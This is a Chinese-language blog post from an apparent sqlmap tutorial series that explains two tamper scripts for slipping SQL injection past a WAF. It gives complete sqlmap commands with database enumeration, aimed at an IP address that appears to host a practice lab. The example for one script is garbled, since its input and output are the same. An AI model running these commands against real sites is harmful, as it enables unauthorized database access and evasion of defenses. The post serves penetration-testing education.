sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py

26. modsecurityzeroversioned.py脚本

使用带有数字0的注释(/*!00000 */--) 包围整个完整的查询适用于mysql数据库

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="modsecurityzeroversioned.py" --proxy="http://127.0.0.1:8080" -batch

确认是可以进行这正常注入，我们看看burp抓包效果

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

27. multiplespaces.py脚本

这个作用是SQL注入关键字旁边附近多加个空格，例如："tampler('1 union select bmfx'") 将其处理为 "'1 union select bmfx'" 适用于所有数据库

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="multiplespaces.py" --proxy="http://127.0.0.1:8080" -batch

确认可以注入，我们看看burp抓包效果

效果还是比较明显的，添加了很多空格

posted @ 2020-08-21 10:18 皇帽讲绿帽带法技巧阅读(220) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

皇帽讲绿帽带法技巧

sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py

公告